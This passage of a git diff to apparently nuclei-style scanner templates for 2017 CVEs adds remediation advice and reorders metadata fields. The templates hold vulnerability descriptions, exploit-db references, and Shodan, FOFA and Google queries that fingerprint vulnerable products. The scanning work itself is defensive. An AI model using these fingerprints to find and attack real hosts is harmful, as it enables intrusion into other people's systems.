cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* epss-percentile: 0.49573 + cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index f7e453536c..1d1f18c262 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -5,6 +5,8 @@ info: author: Random_Robbie severity: high description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules. + remediation: | + Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability. reference: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96872 - cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* epss-percentile: 0.9957 + cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 8245e76127..8a2b4e34ac 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + remediation: | + Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks. reference: - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf - https://www.exploit-db.com/exploits/42986/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* epss-percentile: 0.46905 + cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 - framework: dreambox vendor: bouqueteditor_project product: bouqueteditor + framework: dreambox tags: dreambox,edb,cve,cve2017,xss http: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 1033033a9d..654d4a1ba0 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter. + remediation: | + Update to the latest version of Restler and TYPO3 to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/42985 - https://extensions.typo3.org/extension/restler/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.04393 - cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* epss-percentile: 0.91303 + cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 - framework: typo3 vendor: luracast product: restler + framework: typo3 tags: cve,cve2017,restler,lfi,edb http: diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index f1aa56b49b..6bc0c78bdc 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + remediation: | + Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/44054 - https://blogs.securiteam.com/index.php/archives/3472 @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-15647 cwe-id: CWE-22 epss-score: 0.02013 - cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.87436 + cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fiberhome diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index fe64daa1a0..7506ebf435 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in , which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. + remediation: | + Upgrade Apache httpd to a version higher than 2.4.29 or apply the necessary patches. reference: - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 - https://httpd.apache.org/security/vulnerabilities_24.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-15715 cwe-id: CWE-20 epss-score: 0.97053 - cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* epss-percentile: 0.99649 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 4fec82c069..582d380067 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -5,6 +5,8 @@ info: author: emadshanab,milo2012 severity: critical description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + remediation: | + Apply the latest security patches and updates provided by Palo Alto Networks. reference: - https://www.exploit-db.com/exploits/43342 - https://security.paloaltonetworks.com/CVE-2017-15944 @@ -16,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-15944 epss-score: 0.97425 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* epss-percentile: 0.99895 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 3e8ce9ae33..55d7eb2883 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. + remediation: | + Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/43141 - https://nvd.nist.gov/vuln/detail/CVE-2017-16806 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07055 - cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* epss-percentile: 0.93105 + cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ulterius diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 22ba3c00a5..3271ccd802 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information. + remediation: | + Upgrade Nextjs to version 2.4.1 or above to mitigate this vulnerability. reference: - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 - https://github.com/zeit/next.js/releases/tag/2.4.1 @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.0032 - cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* epss-percentile: 0.66762 + cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index c74d570fad..dc76963dd1 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel. + remediation: | + Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894 - https://packetstormsecurity.com/files/cve/CVE-2017-16894 @@ -18,15 +20,15 @@ info: cve-id: CVE-2017-16894 cwe-id: CWE-200 epss-score: 0.29151 - cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* epss-percentile: 0.9629 + cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="Laravel-Framework" - shodan-query: Laravel-Framework verified: true + max-request: 1 vendor: laravel product: laravel + shodan-query: Laravel-Framework + fofa-query: app="Laravel-Framework" tags: cve2017,laravel,exposure,packetstorm,cve http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 07c810f05a..7083be0b7e 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + remediation: | + Update to the latest version of the WordPress Emag Marketplace Connector plugin (1.1) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/ - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* epss-percentile: 0.6175 + cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: zitec product: emag_marketplace_connector + framework: wordpress tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index c16eeb27d7..a8919bc489 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php. + remediation: | + Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor. reference: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2017-17059 cwe-id: CWE-79 epss-score: 0.00263 - cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* epss-percentile: 0.63188 + cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: amtythumb_project product: amtythumb + framework: wordpress tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 2f8b58dff2..7752e2f05d 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + remediation: | + Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability. reference: - https://wordpress.org/plugins/wp-mailster/#developers - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54328 + cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpmailster product: wp_mailster + framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm http: diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 7434002dcc..0f15b649b6 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -6,6 +6,8 @@ info: severity: high description: | description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. + remediation: | + Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability. reference: - https://www.elttam.com/blog/goahead/ - https://github.com/ivanitlearning/CVE-2017-17562 @@ -18,8 +20,8 @@ info: cve-id: CVE-2017-17562 cwe-id: CWE-20 epss-score: 0.9747 - cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* epss-percentile: 0.99941 + cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* metadata: max-request: 65 vendor: embedthis diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index c20bef64a3..d44999c3d3 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php. + remediation: | + Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731 - https://nvd.nist.gov/vuln/detail/CVE-2017-17731 @@ -17,14 +19,14 @@ info: cve-id: CVE-2017-17731 cwe-id: CWE-89 epss-score: 0.14043 - cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* epss-percentile: 0.94965 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: - fofa-query: app="DedeCMS" max-request: 1 - shodan-query: http.html:"DedeCms" vendor: dedecms product: dedecms + shodan-query: http.html:"DedeCms" + fofa-query: app="DedeCMS" tags: sqli,dedecms variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 2101fa0fed..1df0e340a4 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard. + remediation: | + Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability. reference: - https://www.exploit-db.com/ghdb/5694 - https://nvd.nist.gov/vuln/detail/CVE-2017-17736 @@ -16,14 +18,14 @@ info: cve-id: CVE-2017-17736 cwe-id: CWE-425 epss-score: 0.1483 - cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* epss-percentile: 0.95082 + cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: intitle:"kentico database setup" verified: true + max-request: 1 vendor: kentico product: kentico_cms + google-query: intitle:"kentico database setup" tags: cve,cve2017,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 23e6ac0806..4d9c0bea4e 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. + remediation: | + Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://hackerone.com/reports/963798 - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00072 - cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* epss-percentile: 0.29644 + cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: avantfax diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 0523195af2..7834cba252 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting. + remediation: | + Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - https://wordpress.org/plugins/stop-user-enumeration/#developers @@ -15,13 +17,13 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* epss-percentile: 0.36469 + cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: fullworks product: stop_user_enumeration + framework: wordpress tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin http: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 424651e733..659b3de1c1 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: medium description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + remediation: | + Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/8934 - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* epss-percentile: 0.38904 + cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: designmodo product: qards + framework: wordpress tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss http: diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index ef98b24520..21366ae735 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + remediation: | + Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches. reference: - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html - https://github.com/graphite-project/graphite-web/issues/2008 @@ -18,8 +20,8 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.00902 - cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* epss-percentile: 0.80714 + cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: graphite_project diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 0eb4e3b917..3cb9a64175 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + remediation: | + Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 @@ -15,8 +17,8 @@ info: cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96927 - cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99602 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index f6d90aa5ca..7453123227 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' + remediation: | + Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability. reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* epss-percentile: 0.80229 + cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 9991ecccc0..481c4bd21a 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request. + remediation: | + Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability. reference: - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* epss-percentile: 0.49337 + cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mcafee diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 51d2af5f54..855f454857 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -5,6 +5,8 @@ info: author: Manas_Harsh,daffainfo,geeknik,dr0pd34d severity: medium description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. + remediation: | + Update WordPress to version 4.7.1 or later reference: - https://www.exploit-db.com/exploits/41497 - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2017-5487 cwe-id: CWE-200 epss-score: 0.97179 - cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* epss-percentile: 0.99719 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.component:"WordPress" verified: true + max-request: 2 vendor: wordpress product: wordpress + shodan-query: http.component:"WordPress" tags: cve,cve2017,wordpress,wp,edb http: diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index c4ef86a2a9..8116c4b40c 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -6,6 +6,8 @@ info: severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* epss-percentile: 0.99876 + cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 2b02ed7129..980f4583c9 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: - https://www.openbugbounty.org/incidents/228262/ - https://www.exploit-db.com/exploits/42042/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* epss-percentile: 0.64713 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kmc_information_systems diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index f63d6b8258..fe34d7b79d 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string. + remediation: | + Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches. reference: - https://github.com/mazen160/struts-pwn - https://isc.sans.edu/diary/22169 @@ -18,14 +20,14 @@ info: cve-id: CVE-2017-5638 cwe-id: CWE-20 epss-score: 0.9756 - cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* epss-percentile: 0.99995 + cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Apache Struts" verified: true + max-request: 1 vendor: apache product: struts + shodan-query: html:"Apache Struts" tags: cve,cve2017,apache,kev,msf,struts,rce http: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index cdd981e82c..42d76fe036 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 